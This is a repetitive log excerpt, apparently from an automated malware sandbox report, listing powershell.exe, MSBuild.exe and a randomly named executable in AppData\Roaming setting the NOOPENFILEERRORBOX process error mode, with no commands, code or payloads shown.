Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
